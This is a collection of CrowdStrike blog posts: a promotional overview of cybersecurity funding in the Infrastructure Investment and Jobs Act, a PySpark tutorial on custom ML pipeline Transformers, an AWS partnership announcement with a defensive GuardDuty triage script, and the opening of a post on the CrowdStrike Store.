Securing Our Nation: How the Infrastructure Investment and Jobs Act Delivers on Cyber Resiliency

1 August 2022 at 15:21

Attacks and intrusions on our nation’s vital infrastructure — our electrical grid, water systems, ports and oil supply — are on the rise. For example, as reported by the Pew Charitable Trust in March 2021, hackers changed the chemical mixture of the water supply in Oldsmar, Fla., increasing by 100 times the level of sodium hydroxide (lye) in the water supply. In June 2021, Reuters published an article about how poor cyber hygiene, ineffective cybersecurity practices and the danger of stolen credentials impacted millions of people when a cyberattack interrupted the flow of fuel on the East Coast of the United States. As we hyperconnect our cities and communities, security must be at the forefront of every plan and design.

Recognizing the required investment in the United States, Congress passed the Infrastructure Investment and Jobs Act (IIJA) in November 2021. The IIJA authorizes roughly $1 trillion USD in funding for a number of initiatives that include improving our highways, repairing bridges, creating smart cities, studying the effects of climate change, developing new clean energy technology and both improving and hardening our electrical and water utilities.

For anyone who’s not accustomed to reading legislation, 1,000 pages of complex legislation can be intimidating. States and large cities, as well as larger businesses supporting critical infrastructure, may have entire divisions or established working groups dedicated to understanding and pursuing this and other grant programs. I can only imagine there are numerous small and medium-sized companies, as well as local and tribal governments who, like me, have little experience in taking advantage of the incredible funding opportunities in this and other grants across the federal government.

Here, I will identify some parts of the IIJA your organization may be able to take advantage of. Whether you have people who work with federal grant funding, or not, awareness of this capability to make up for budget shortfalls while building our critical infrastructure is important. We created an easy-to-read document that outlines cybersecurity-specific sections of the Act and the CrowdStrike solution in our “How CrowdStrike Supports the IIJA” white paper.

Key IIJA Cybersecurity Funding Provisions

Key provisions of the IIJA provide funds to federal agencies and state, local, tribal and territorial governments, as well as public and private utility and transportation entities, to implement cybersecurity solutions that promote stronger cybersecurity resilience and the ability to assess, detect, identify, mitigate and respond to cyber threats today and into the future.

In particular, the IIJA calls out the U.S. Department of Transportation (DOT), Department of Energy (DOE), Department of Homeland Security (DHS) and Environmental Protection Agency (EPA) for specified cybersecurity funding. Within these provisions, the federal government will provide $3.5 billion USD for key projects that include requirements to improve cybersecurity posture and resiliency, promote intelligence sharing and respond to attacks. 

DHS: Layering Our Defenses and Coordinating Our Response

The Cyber Response and Recovery Act and the new State and Local Cybersecurity Grant Program provide over $1.1 billion USD to state, local, tribal and territorial governments including public-private partnerships. These funds are available for seven and five years, respectively, and seek to address cyber risks and threats by supporting threat hunting, network protection and the replacement and modernization of tools and systems. The Cybersecurity Infrastructure Security Agency (CISA), a component agency of DHS, is tasked with defending the infrastructure of the internet and improving its resilience and security for the nation. Each organization must submit its cybersecurity plan when applying for grant funding and, in the case of the State and Local Cybersecurity Grant Program, successful applicants will receive up to 90% of required funding for the first year. 

DOT: Improving and Securing Our Roads, Bridges and Ports 

As the U.S. transportation system’s networks evolve into a hyperconnected mesh of data and information to make them more efficient, their attack surface exponentially increases. The IIJA directs two specific programs under the DOT to strengthen the cybersecurity posture of the transportation system. The Strengthening Mobility and Revolutionizing Transportation (SMART) grant provides $500 million USD over five years to state, local and tribal governments, and public toll authority and metropolitan planning agencies, to ensure the security of smart cities by implementing cybersecurity best practices. The second program, Advanced Research Projects Agency-Infrastructure (ARPA-I), provides unspecified funding for the advancement of cybersecurity technology solutions that promote the resiliency of roads, highways, bridges, airports, seaports and railways against cyberattacks.

DOE: Keeping the Lights On

The resiliency of the U.S. electrical and power system is critical to national security. Recent years have shown how delicate the grid is, and our adversaries have demonstrated they are adept at attacking power grids. Seven programs provide over $1 billion USD in investment funding to secure research, modernization and resiliency in the energy sector and electrical grid. These projects include maturity models and threat assessments, protection, detection, response and recovery from cyber threats to pilot projects to gain experience with new cyber technology. Each of these provides state, local, tribal and territorial governments, as well as public and private electrical utility companies, with the ability to harden and improve their network defenses, expand cyber defense capabilities and capacity, and gain a clear understanding of their environment and the efficacy of their cybersecurity plans. 

EPA: Ensuring Our Drinking Water Is Safe and Sewers Keep Flowing 

With two programs valued at $375 million USD over five years, the EPA’s Midsize and Large Drinking Water System Infrastructure Resilience and Sustainability Program, and the Clean Water Infrastructure Resiliency and Sustainability Program, seek to improve the resiliency of the nation’s water system. This section of the IIJA directs public and private water providers and state and local governments to develop and implement projects that reduce the cybersecurity vulnerabilities of water systems in communities across the United States. 

The CrowdStrike Mission: We Stop Breaches

The integrated CrowdStrike security platform provides governments and organizations with the optimal solution to protect and defend their environments while taking advantage of IIJA funding. We offer endpoint protection capabilities plus a 24/7/365 managed services offering designed to augment teams that may not be staffed to support immediate response — solution attributes that are specifically mentioned in numerous sections of the IIJA. And with over a decade of proven performance in preventing breaches and ensuring resiliency of small, medium and large corporations and governments worldwide, CrowdStrike is the clear choice for securing our critical infrastructure and your valuable data during a cyberattack or intrusion.

In addition, CrowdStrike has a robust team of threat advisors and intelligence experts who ensure the rapid flow of threat and adversary contextual information, increasing the strategic impact of information across your environment. Recognizing that 80% of attacks in 2021 were identity-based, CrowdStrike now offers the industry’s first fully managed identity threat protection solution, delivering identity threat prevention and IT policy enforcement so that IT and security teams can sleep better at night. In many cases the adversary manages to bypass standard security measures using valid, stolen credentials. Organizations are now demanding these integrated capabilities where services are delivered through a single, lightweight sensor implemented in on-premises, hybrid and cloud environments. Ultimately there is a need to provide immediate protection, decreasing risk while allowing clients to focus on providing their core services and products.

The CrowdStrike Falcon® platform provides an increasingly expansive ecosystem of protection capabilities, from endpoint and cloud security, to threat intelligence, identity protection and IT operations. CrowdStrike’s open ecosystem and growing list of industry-leading partnerships enhances and extends our powerful protection across critical areas like operational technology (OT), Internet of Things (IoT) network security and more, empowering forward-leaning organizations to take advantage of the funding in the IIJA. Our integrated Falcon platform capabilities and extended security ecosystem accessible via the CrowdStrike Store provide answers to the challenges and gaps outlined in the IIJA.

Are you interested in learning more about how CrowdStrike can assist you in your journey and help get the funding you need? Now is the time to take advantage of this opportunity. Adversaries will not wait — and neither should you. Whether you provide electricity to local communities, are responsible for designing and building our nation’s bridges and roads, or serve our citizens in local, state or tribal governments, we are here to help. Schedule a meeting with one of our professionals to learn more about how we can help you harden your network and improve your cyber resiliency.

A Deep Dive into Custom Spark Transformers for Machine Learning Pipelines

27 July 2022 at 15:34
  • Modern Spark Pipelines are a powerful way to create machine learning pipelines
  • Spark Pipelines use off-the-shelf data transformers to reduce boilerplate code and improve readability for specific use cases
  • This blog outlines how to construct custom Spark Transformers to integrate with Spark Pipelines
  • Learn how to identify the components of each Transformer class member function and correctly serialize and deserialize the transformer to and from disk 

CrowdStrike data scientists often explore novel approaches for creating machine learning pipelines especially when processing a large volume of data. The CrowdStrike Security Cloud stores more than 15 petabytes of data in the cloud and gathers data from trillions of security events per day, using it to secure millions of endpoints, cloud workloads and containers around the globe with the power of machine learning and indicators of attack.

When processing so much data, modern Spark Pipelines are a powerful way to use off-the-shelf libraries to reduce boilerplate code and improve readability. Because the off-the-shelf Transformers may not fit all use cases, it’s important to understand how to construct a custom Spark Transformer that integrates with Spark Pipelines, and to understand the components of a Transformer.

Pipeline Framework

Note: For this blog, we assume usage of PySpark version 3.0+

Machine learning workflows generally consist of multiple high-level steps:

  • Preprocessing your input data via some extract, transform and load (ETL) steps
  • Splitting the dataset for either cross validation or train/test/validate split
  • Training the model
  • Tuning hyperparameters

The code and structure of each step vary greatly and if inconsistently implemented, can affect readability and flexibility of a data scientist’s workflow. In addition, data scientists often reuse components of their workflow with slight modifications in repeated experiments. This is why commonly used frameworks like scikit-learn and Spark have created pipeline frameworks to more flexibly express and assemble common high-level workflows. 

Such frameworks give the user a consistent approach to build out the steps required to conduct experiments and are easy to extend. A less obvious advantage of this framework is the reduction of complexity for collaborators. Pipelines provide a common code structure which is more readable and thus reduces the barrier of entry into your codebase.

The following is a simple example of a pipeline fitted on a dataset:

from pyspark.ml import Pipeline
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.feature import HashingTF, Tokenizer

# Setup a simple pipeline to tokenize -> hashed term frequency vector -> train logistic regression
tokenizer = Tokenizer(inputCol="text", outputCol="words")
hashingTF = HashingTF(inputCol=tokenizer.getOutputCol(), outputCol="features")
lr = LogisticRegression(maxIter=10, regParam=0.001)
pipeline = Pipeline(stages=[tokenizer,
                            hashingTF,
                            lr])
 
# input_dataset is a DataFrame with at least a "text" and a "label" column
model = pipeline.fit(input_dataset)

Because experiments should be reproducible, we may need to save information regarding the state of transformation and model hyperparameters. Without a pipeline, each transformer and model may need to be saved separately, and the order of transformation must be manually preserved. Using Spark Pipeline allows us to save the entire pipeline (including transformer states, order and hyperparameters) as a single object and reload easily. From an experimentation and engineering perspective, this reduces the ambiguity of experiment configurations and makes integrating the model and pipeline downstream more straightforward.

from pyspark.ml import PipelineModel

# save and reload the entire fitted pipeline
model.save(save_path)
 
# use the reloaded pipeline to run the entire process again.
# pipeline.fit() returns a PipelineModel, so it is reloaded with
# PipelineModel.load() rather than Pipeline.load()
loaded_pipeline = PipelineModel.load(save_path)
loaded_predictions = loaded_pipeline.transform(test)
 
# Produces the following output:
```
>> loaded_pipeline.stages
# output shows the stages in the loaded pipeline
[Tokenizer_7397a14f7aaa,
 HashingTF_4c188d1e40c1,
 LogisticRegressionModel: uid=LogisticRegression_a3ac1d359fb0, numClasses=2, numFeatures=12]
```

Custom Data Transformations

With improvements in flexibility and readability comes some additional work. We must conform our code to a structure that’s acceptable by modern pipelines. One very common set of tasks used in pipelines is the transform step of the ETL process, where we must take our raw data and pass it through a series of data transformation steps. The output of these transforms is the vectors and labels used for model training. Though many manipulations on Spark DataFrames can already be done through either native functions or Spark SQL, there are often custom transforms we must apply to every row of our data that require custom code.

Let’s take for example a simple text manipulation Spark Dataset containing id, text and label columns:

from pyspark.sql import SparkSession

spark_session = SparkSession.builder.getOrCreate()
df = spark_session.createDataFrame([
    (0, "a b c d e spark", 1.0),
    (1, "b d", 0.0),
    (2, "spark f g h", 1.0),
    (3, "hadoop mapreduce", 0.0)
], ["id", "text", "label"])
 
# Produces the following table:
```
+---+----------------+-----+
| id|            text|label|
+---+----------------+-----+
|  0| a b c d e spark|  1.0|
|  1|             b d|  0.0|
|  2|     spark f g h|  1.0|
|  3|hadoop mapreduce|  0.0|
+---+----------------+-----+
```

Starting with a Basic Transformation

It is recommended that data transformation should be expressed as Spark SQL when possible due to its under-the-hood integration with Spark query optimizers and JVM. However, this is sometimes not possible with more complex transformations. In such cases, we can use Spark User Defined Function (UDF) to write our transformations. (Note that UDFs will always be slower than native Spark SQL.)

We’d like to apply a transform such that if we see the string spark, we will append an additional signal string to the end of the text. A simple way to apply this transform to each row is to write this function, then run it as a UDF:

from pyspark.sql.functions import col, udf
from pyspark.sql.types import StringType
 
# Define our transformation
def append_string(s, append_val=""):
    """
    If we see the word `spark` in s, append a string to the current string.
    """
    if s and 'spark' in s:
        return s + append_val
    return s
 
 
# Wrap the transformation as a UDF
append_udf = udf(lambda row: append_string(row, " hadoop"), StringType())
 
# Apply the UDF to our Dataset and create a resultant column called `appended_text`
# (truncate=False so that the full appended strings are visible)
df.withColumn("appended_text", append_udf(col("text"))) \
  .show(truncate=False)
 
 
# Produces the following output table:
```
+---+----------------+-----+----------------------+
|id |text            |label|appended_text         |
+---+----------------+-----+----------------------+
|0  |a b c d e spark |1.0  |a b c d e spark hadoop|
|1  |b d             |0.0  |b d                   |
|2  |spark f g h     |1.0  |spark f g h hadoop    |
|3  |hadoop mapreduce|0.0  |hadoop mapreduce      |
+---+----------------+-----+----------------------+
```

Note that although this will apply the correct transform, there are a few inconveniences:

  • We cannot save the internal state of the transform — for example, what value we used for the append_val argument in append_string(). This is especially important if we have many inputs that need to be set before we run our transform.
  • We cannot use it as part of a Pipeline, so we would need to either create a Pipeline which starts after this transform step, or write our own subsequent data transforms manually. This means we need to programmatically ensure that code between experiments stays the same. 

Converting Transformation Function Into a Custom Transformer

To make our transformation function savable, loadable and usable as part of a Pipeline, we inherit from the SparkML Transformer class along with a few mixins to ensure API conformity with SparkML. The converted custom transformer looks like the following:

from your_module import append_string  # the append_string() function we wrote above; "your_module" is a placeholder for wherever you saved it
from pyspark.sql.functions import udf
from pyspark.sql.types import StringType
from pyspark import keyword_only  # Note: use pyspark.ml.util.keyword_only if Spark < 2.0
from pyspark.ml import Transformer
from pyspark.ml.param.shared import HasInputCol, HasOutputCol, Param, Params, TypeConverters
from pyspark.ml.util import DefaultParamsReadable, DefaultParamsWritable


class StringAppender(Transformer,            # Base class
                     HasInputCol,            # Sets up an inputCol parameter
                     HasOutputCol,           # Sets up an outputCol parameter
                     DefaultParamsReadable,  # Makes parameters readable from file
                     DefaultParamsWritable   # Makes parameters writable to file
                     ):
    """
    Custom Transformer wrapper class for append_string()
    """

    # append_str is a value which we would like to be able to store state for, so we create a parameter.
    append_str = Param(
        Params._dummy(),
        "append_str",
        "Value we want to append with",
        typeConverter=TypeConverters.toString,  # This will allow code to automatically try to convert to string
    )

    @keyword_only
    def __init__(self, inputCol=None, outputCol=None, append_str=None):
        """
        Constructor: set values for all Param objects
        """
        super().__init__()
        self._setDefault(append_str=None)
        kwargs = self._input_kwargs
        self.setParams(**kwargs)

    @keyword_only
    def setParams(self, inputCol=None, outputCol=None, append_str=None):
        kwargs = self._input_kwargs
        return self._set(**kwargs)

    def setAppendStr(self, new_append_str):
        return self.setParams(append_str=new_append_str)

    # Required if you use Spark >= 3.0
    def setInputCol(self, new_inputCol):
        return self.setParams(inputCol=new_inputCol)

    # Required if you use Spark >= 3.0
    def setOutputCol(self, new_outputCol):
        return self.setParams(outputCol=new_outputCol)

    def getAppendStr(self):
        return self.getOrDefault(self.append_str)

    def _transform(self, dataset):
        """
        This is the main member function which applies the transform to transform data from the `inputCol` to the `outputCol`
        """
        if not self.isSet("inputCol"):
            raise ValueError(
                "No input column set for the "
                "StringAppenderTransformer transformer."
            )
        input_column = dataset[self.getInputCol()]
        output_column = self.getOutputCol()
        append_str = self.getAppendStr()
        udf_func = lambda x: append_string(x, append_str)
        data_type = StringType()

        return dataset.withColumn(output_column,
                                  udf(udf_func, data_type)(input_column))

Let’s break down some components of this wrapper and discuss each in detail:

  • Transformer Abstract Base Class
  • Param Type Member Variables
  • @keyword_only Decorator, Constructor and Input Persistence
  • Mixins: HasInputCol, HasOutputCol
  • Traits: DefaultParamsReadable, DefaultParamsWritable

Transformer Abstract Base Class

Every custom transformer must at least inherit pyspark.ml.Transformer as the abstract base class.

We must also, at a minimum, override the _transform() function so that the Transformer knows how to transform our data. The input passed to _transform() is the entire input Dataset including all the columns, so we will need to retrieve the input and output column names (usually set by the constructor).

Now that we have the input dataset, input_column name and output_column name, we can wrap our transformation function append_string(). Note that if the transformation function requires more than a single input, you will need to convert it into one which accepts a single input. You can do this using a lambda function.

# Code snippet of _transform():
        udf_func = lambda x: append_string(x, append_str)  # append_string() takes two inputs, we can wrap it with a lambda
        data_type = StringType()
         
        # Note we need to wrap udf_func with pyspark.sql.functions.udf
        return dataset.withColumn(output_column,
                                  udf(udf_func, data_type)(input_column))

Param Type Member Variables

As part of constructing the custom transformer, we will need to generate pyspark.ml.param.shared.Param objects for each of the following:

  • an input_column name which indicates the data that should be transformed
  • the output_column  where the transformed data should be written.
  • any additional data that needs to be stored by the Transformer (e.g., append_str, the string we want to append in our example)

Param objects can be set to a value like normal variables but enable us to more easily read and write them to/from file using Spark’s native methods. Generally these can be set at initialization with the constructor (__init__()). However, because we inherit from HasInputCol and HasOutputCol, the Param type member variables inputCol and outputCol respectively are created automatically for us. Thus we only need to create the append_str Param object. See the next section for more information on the mixins.

    append_str = Param(
        Params._dummy(),
        "append_str",
        "Value we want to append with",
        typeConverter=TypeConverters.toString,   # This will allow code to automatically try to convert to string
    )

The typeConverter parameter here helps implicitly apply type conversions if the data type is different.

Mixins: HasInputCol, HasOutputCol

Inheriting the mixins HasInputCol and HasOutputCol reduces the amount of boilerplate code we must write. HasInputCol will create a Param member variable for your custom transformer class called inputCol that can then be set/retrieved/written to file. Same effect for HasOutputCol and the member variable outputCol. Additionally, each mixin here will also initialize default values for its member variable.

Optionally, you can implement setInputCol()  and setOutputCol() to conform more closely with standard transformers available in SparkML.

There are also additional mixins that can be inherited if needed (e.g., a list of input columns or output columns). For more information, please refer to the pyspark API.

@keyword_only Decorator, Constructor and Input Persistence

To correctly create a custom transformer, we must be able to store the inputs used to create the transformer. The inputs will be stored as Param type member variables within our custom transformer class. Let’s break down how this is done.

@keyword_only
def __init__(self, inputCol=None, outputCol=None, append_str=None):
    """
    Constructor: set values for all Param objects
    """
    super().__init__()
    self._setDefault(append_str=None)
    kwargs = self._input_kwargs
    self.setParams(**kwargs)

Here, @keyword_only will store the input keyword arguments (inputCol, outputCol and append_str in our example) as an internal map inside the Transformer (in a protected variable called _input_kwargs). After the input arguments are stored, we must manually set a default (using _setDefault()) for any custom Param we pass in that isn’t provided by the mixins we inherited from. Because we inherited from HasInputCol and HasOutputCol, we do not need to do this for inputCol and outputCol. Setting defaults ensures we can safely retrieve the variables later using the inherited member function getOrDefault().

Next we set the Param type member variables (by calling setParams()) using our map _input_kwargs so that we can correctly retrieve the true assigned values when we need them later. 

Finally, when we decide to retrieve variables such as inputCol or append_str, we will need to call getOrDefault(), as in self.getOrDefault(self.append_str). This is different from how we normally retrieve a variable in Python because each variable is a Param object. See the definition of getAppendStr() for more detail.

Traits: DefaultParamsReadable, DefaultParamsWritable

The final component of creating a custom transformer is to inherit the traits DefaultParamsReadable and DefaultParamsWritable, which allow us to correctly write to file and read from file, both as part of a pipeline and by itself. These traits will read/write the Params we have created to file.

Not inheriting these traits may lead to errors like the following when attempting to save a custom transformer:

ValueError: ('Pipeline write will fail on this pipeline because stage %s of type %s is not MLWritable', 'StringAppender_281f47e48529', <class '__main__.StringAppender'>)

Using a Custom Transformer as Part of a Pipeline

Once the custom transformer is built, attaching it to a pipeline is straightforward. We initialize our custom transformer with the correct input/output columns and the append string to use, then add it as a stage to our pipeline. For example, if we extend the pipeline from the “Pipeline Framework” section above, we will have:

from pyspark.ml import Pipeline
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.feature import HashingTF, Tokenizer
from custom_transformer import StringAppender  # This is the StringAppender we created above
 
appender = StringAppender(inputCol="text", outputCol="updated_text", append_str=" hadoop")  # initialize our custom transformer
# the tokenizer reads the appender's output column so that the appended text actually feeds the rest of the pipeline
tokenizer = Tokenizer(inputCol=appender.getOutputCol(), outputCol="words")
hashingTF = HashingTF(inputCol=tokenizer.getOutputCol(), outputCol="features")
lr = LogisticRegression(maxIter=10, regParam=0.001)
pipeline = Pipeline(stages=[appender,   # add the transformer as a stage
                            tokenizer,
                            hashingTF,
                            lr])

As we can see, converting a custom processing function into a custom transformer step requires us to implement the pattern discussed in this post. Although there are some non-trivial components to wrapping functions, the pattern for this work is consistent, so it can be applied to most processing functions. Additionally, custom transformers can then be used as part of a pipeline to further improve code readability and integration with native Spark pipeline frameworks. Finally, setting up your processing functions as transformers allows us to save entire pipelines to disk, which can be more easily shared and used by collaborators downstream of your workflow.

Additional Resources

  • Learn more about today’s adversaries and how to combat them at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21! 
  • Learn more about the powerful, cloud-native CrowdStrike Falcon® platform by visiting the product webpage.
  • Get a full-featured free trial of CrowdStrike Falcon Prevent™ and learn how true next-gen AV performs against today’s most sophisticated threats.

CrowdStrike and AWS Expand Partnership to Offer Customers DevOps-Ready Security

26 July 2022 at 16:45

Cloud-based services are augmenting business operations and being adopted at a record pace. In fact, ​Gartner® estimates “more than 85% of organizations will embrace a cloud-first principle by 2025 and will not be able to fully execute on their digital strategies without the use of cloud-native architectures and technologies.”

As cloud adoption continues unabated, adversaries are becoming increasingly adept at finding security gaps to exploit cloud environments. According to the CrowdStrike 2022 Global Threat Report, cloud-based services are “increasingly abused by malicious actors in the course of computer network operations (CNO), a trend that is likely to continue in the foreseeable future as more businesses seek hybrid work environments.”

Defending cloud-based services requires securing a rapidly growing attack surface. DevOps and security teams must enforce continuous monitoring and protection from the development process to runtime to ensure DevOps-ready security. Agentless-only solutions only offer partial visibility and lack remediation capabilities. Securing the cloud requires an approach that combines agentless scanning with agent-driven protection, ensuring that DevOps and security teams are able to deploy the protection they need regardless of their environment. They need integrated protection and visibility to understand and stay ahead of modern adversaries.

CrowdStrike continues to extend our partnership with AWS to provide DevOps-ready security, and this week we’re making multiple key announcements to underscore our commitment: our Threat Detection and Remediation distinction in the AWS Security Competency; our role as a Launch Partner of AWS services; and our Service Ready designation.

AWS Security Competency Re-Launch

CrowdStrike is excited to announce today that it has achieved Threat Detection and Remediation distinction in the AWS Security Competency. This designation recognizes that CrowdStrike has successfully met AWS’s technical and quality requirements for providing customers with a deep level of protection and expertise in threat detection and remediation to help them achieve their cloud security goals.

Achieving the Threat Detection and Remediation distinction in the AWS Security Competency differentiates CrowdStrike as an AWS partner that provides specialized solutions designed to help companies — from startups and mid-sized businesses to the largest global enterprises — to adopt, develop and deploy security into their AWS environments, increasing their overall security posture on AWS. To receive the designation, partners must possess deep AWS expertise and deliver solutions seamlessly on AWS.

CrowdStrike Named a Launch Partner of AWS Services

Humio-powered Amazon GuardDuty Malware Protection: Amazon is launching Amazon GuardDuty Malware Protection for potentially compromised Amazon Elastic Compute Cloud (Amazon EC2) instances and containers running on Amazon EC2 (Amazon Elastic Kubernetes Service [Amazon EKS], Amazon ECS and customer-managed Kubernetes). Once Amazon GuardDuty Malware Protection enhancement is enabled and Amazon GuardDuty detects suspicious activity on a workload, it will initiate a malware scan on the associated Amazon EC2 instance. With the new Amazon GuardDuty Malware Protection, customers will have more context to detect malicious software as the source of suspicious behavior so they can take appropriate response actions. Amazon GuardDuty Malware Protection detects malware on Amazon Elastic Block Store (Amazon EBS)-backed Amazon EC2 instances and containers. If malware is detected during the scan, an additional finding will be generated by Amazon GuardDuty.

As a launch partner for Amazon GuardDuty Malware Protection, CrowdStrike provides customers with a specific Humio shipper for these Amazon GuardDuty logs to ingest all events identified, including the new types introduced with this release. This combination will include queries and dashboards for customers to contextually analyze, report and act based on the findings in Amazon GuardDuty. Customers will now have greater extensibility to use the breadth of services at AWS to simplify routing of logs to Humio, enabling accelerated threat hunting and search across their AWS footprint for novel and advanced cyber threats. As a launch partner, CrowdStrike provides customers with:

  • A defense-in-depth approach to protect instances that may not be protected or address blind spots where CrowdStrike Falcon® agents aren’t deployed
  • Context enrichment from other applications and platform logs
  • Automated remediation, such as notification through Humio’s built-in actions or isolating an Amazon EC2 instance for incident response via a webhook

Figure 1. Amazon GuardDuty dashboard in the CrowdStrike Humio console
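The triage-and-isolate flow described above (a malware finding arrives, and a high-severity hit on an EC2 instance is turned into an isolation action that a webhook can carry) can be illustrated with a small handler. The code below is an added example, not CrowdStrike, Humio or AWS code. It assumes the EventBridge shape GuardDuty uses for findings (detail.type, detail.severity, detail.resource.resourceType, detail.resource.instanceDetails.instanceId), assumes that Malware Protection finding types carry an "Execution:EC2/", "Execution:Kubernetes/" or "Execution:Container/" prefix (check the GuardDuty finding-type reference for your account), and uses constructed sample findings; the webhook payload shape is likewise an assumption.

```python
"""Triage of Amazon GuardDuty Malware Protection findings into EC2 isolation actions.

Added example (not CrowdStrike, Humio or AWS code). Assumes the EventBridge
finding shape and the malware finding-type prefixes named in the lead-in.
All sample data below is constructed for the example.
"""
from __future__ import annotations

import json
from dataclasses import dataclass

# Assumed prefixes of GuardDuty Malware Protection finding types (verify in the AWS docs).
MALWARE_TYPE_PREFIXES = ("Execution:EC2/", "Execution:Kubernetes/", "Execution:Container/")


@dataclass(frozen=True)
class IsolationAction:
    instance_id: str
    finding_id: str
    severity: float
    reason: str

    def webhook_payload(self) -> str:
        """JSON body a Humio action webhook could post to an isolation endpoint (assumed shape)."""
        return json.dumps(
            {"action": "isolate-ec2", "instanceId": self.instance_id,
             "findingId": self.finding_id, "severity": self.severity, "reason": self.reason},
            sort_keys=True,
        )


def is_malware_finding(finding_type: str) -> bool:
    return finding_type.startswith(MALWARE_TYPE_PREFIXES)


def plan_isolation(event: dict, min_severity: float = 7.0) -> IsolationAction | None:
    """Return an IsolationAction for a malware finding on an EC2 instance, else None.

    Only malware findings at or above min_severity (GuardDuty 'High' starts at 7.0)
    on resourceType "Instance" qualify; everything else stays in the hunting workflow.
    """
    detail = event.get("detail", {})
    finding_type = detail.get("type", "")
    severity = float(detail.get("severity", 0))
    resource = detail.get("resource", {})
    if not is_malware_finding(finding_type):
        return None
    if resource.get("resourceType") != "Instance":
        return None
    if severity < min_severity:
        return None
    instance_id = resource.get("instanceDetails", {}).get("instanceId")
    if not instance_id:
        return None
    return IsolationAction(instance_id, detail.get("id", ""), severity, finding_type)


def triage(events: list[dict], min_severity: float = 7.0) -> list[IsolationAction]:
    """Plan at most one isolation per instance, keeping the highest-severity finding."""
    best: dict[str, IsolationAction] = {}
    for event in events:
        action = plan_isolation(event, min_severity)
        if action is None:
            continue
        current = best.get(action.instance_id)
        if current is None or action.severity > current.severity:
            best[action.instance_id] = action
    return sorted(best.values(), key=lambda a: (-a.severity, a.instance_id))


# Constructed sample events (identifiers and values invented for the example).
SAMPLE_EVENTS = [
    {"detail": {"id": "f-001", "type": "Execution:EC2/MaliciousFile", "severity": 8.0,
                "resource": {"resourceType": "Instance", "instanceDetails": {"instanceId": "i-0aaa"}}}},
    {"detail": {"id": "f-002", "type": "Execution:EC2/MaliciousFile", "severity": 5.0,
                "resource": {"resourceType": "Instance", "instanceDetails": {"instanceId": "i-0bbb"}}}},
    {"detail": {"id": "f-003", "type": "Recon:EC2/PortProbeUnprotectedPort", "severity": 8.0,
                "resource": {"resourceType": "Instance", "instanceDetails": {"instanceId": "i-0ccc"}}}},
    {"detail": {"id": "f-004", "type": "Execution:EC2/MaliciousFile", "severity": 8.5,
                "resource": {"resourceType": "Instance", "instanceDetails": {"instanceId": "i-0aaa"}}}},
]

if __name__ == "__main__":
    for action in triage(SAMPLE_EVENTS):
        print(action.webhook_payload())
```

Run against the constructed events, only i-0aaa is isolated (from finding f-004, the higher-severity duplicate); the medium-severity malware hit and the non-malware port probe are left for analyst review rather than automated containment. The severity floor is the knob to tune: isolating on every malware finding avoids missed containment, but on shared build hosts it may be better to route medium findings to a ticket.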

AWS Service Ready Achievements

The AWS Service Ready Program is designed to validate software products that are built by AWS partners and work with specific AWS services. These software products are technically validated by AWS Partner Solution Architects for their sound architecture and adherence to AWS best practices, and for their market adoption including customer successes. CrowdStrike has completed all of the requirements for two Service Ready Programs:

AWS Graviton Ready: AWS Graviton processors are designed to deliver the best price performance for cloud workloads running in Amazon EC2. As an AWS Graviton Ready Partner, CrowdStrike provides:

  • Industry-leading protection across AWS Graviton-powered workloads through machine learning and artificial intelligence
  • Unparalleled visibility and alert context across compute services powered by Graviton processors, including Amazon EC2
  • Unified security across endpoints, cloud workloads and identity

AWS PrivateLink Service Ready: AWS PrivateLink provides private connectivity between VPCs, AWS services, and your on-premises networks, without exposing your traffic to the public internet. AWS PrivateLink makes it easy to connect services across different accounts and VPCs to significantly simplify your network architecture. CrowdStrike is now an AWS PrivateLink Ready Partner, and the integration enables customers’ sensor-to-cloud traffic to flow via AWS PrivateLink, reducing internet exposure and simplifying network architectures.

The Powerful Benefits of CrowdStrike and AWS

Our joint solutions and integrations in various AWS services are powered by the CrowdStrike Security Cloud and the CrowdStrike Falcon platform, which leverage real-time indicators of attack, threat intelligence, evolving adversary tradecraft and enriched telemetry from across the enterprise to deliver hyper-accurate detections, automated protection and remediation, elite threat hunting and prioritized observability of vulnerabilities. Customers benefit from better protection, better performance and immediate time-to-value. With over a dozen service-level integrations available, joint AWS and CrowdStrike customers are provided with a consistent security posture between their on-premises workloads and those running in the AWS cloud for DevOps-ready security.

  • Unified hybrid security experience: CrowdStrike supports secure deployment and management of AWS Graviton processors, and workloads across Amazon EKS, AWS Fargate, and Amazon EKS Anywhere. With a single lightweight agent and single management console, customers can experience a unified, end-to-end experience from the host to the cloud. No matter where compute workloads are located, customers benefit from visibility, compliance and threat detection and response to outsmart the adversary.
  • A modern and consistent security approach: The latest integrations, support and Service Ready achievements from CrowdStrike for AWS allow organizations to implement a modern enterprise security approach where protection is provided across your AWS infrastructure to defend against sophisticated threat activity.

Try a 15-day trial to see how the CrowdStrike Falcon platform’s superior cyberattack prevention, malicious activity detection and immediate response capabilities can be fully deployed in minutes to protect your business.

Endnotes

  1. Gartner, “Gartner Says Cloud Will Be the Centerpiece of New Digital Experiences,” November 10, 2021.

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and is used herein with permission. All rights reserved.

Additional Resources

Address the Cybersecurity Skills Shortage by Building Your Security Stack with the CrowdStrike Store

26 July 2022 at 12:04

The increase in attack sophistication coupled with the decline of skilled security staff continues to put pressure on organizations and their teams by minimizing their ability to effectively see and control risks within the enterprise. This is only made more difficult as teams find themselves patching together disparate solutions, resulting in labyrinthine security stacks and a heavily siloed environment. To move beyond these challenges, organizations seek to employ innovative technology, processes and people that boost unification across their technology and teams, reducing visibility gaps and enabling a more effective security strategy.

By implementing effective, interoperable IT and security solutions, organizations can benefit from shared data and layered security capabilities, without additional operation friction, for enhanced clarity and control around potential threats throughout their environment. The CrowdStrike Store is a one-stop-shop IT and cybersecurity software-as-a-service (SaaS) marketplace that allows you to easily discover and implement best-of-breed and interoperable solutions that address your unique use cases, unify your stack and simplify deployment. 

The CrowdStrike Store has recently added new partner applications and integrations, and a free partner plugin, to help seamlessly secure your device management, assets, identities and Internet of Things (IoT) environment. With the release of the JumpCloud application available for free trial and new technology integrations with Asimily, Beyond Identity and SafeBreach, you can ensure more holistic visibility for your team, faster time-to-value and a higher return on investment. 

